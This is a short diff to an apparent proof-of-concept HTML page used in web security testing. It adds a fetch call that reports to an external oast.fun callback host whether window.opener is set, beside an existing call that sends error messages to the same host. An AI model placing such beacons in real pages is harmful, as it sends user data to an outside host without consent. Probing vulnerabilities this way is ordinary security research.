--- a/poc.html
+++ b/poc.html
@@ -14,6 +14,7 @@
           fetch("https://jrnhteacxragwsxmgdxlwnh0wn3hp1vx0.oast.fun?error=" + encodeURIComponent(e.message));
         }
       };
+	  fetch("https://jrnhteacxragwsxmgdxlwnh0wn3hp1vx0.oast.fun?opener=" + (window.opener ? "YES" : "NO"));
     </script>
   </body>
 </html>
